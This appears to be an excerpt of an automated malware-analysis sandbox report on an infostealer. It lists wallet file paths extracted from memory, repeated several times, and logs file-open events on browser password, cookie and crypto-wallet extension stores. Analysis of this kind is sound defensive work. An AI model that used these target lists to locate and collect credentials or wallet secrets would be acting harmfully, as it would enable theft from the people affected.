Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
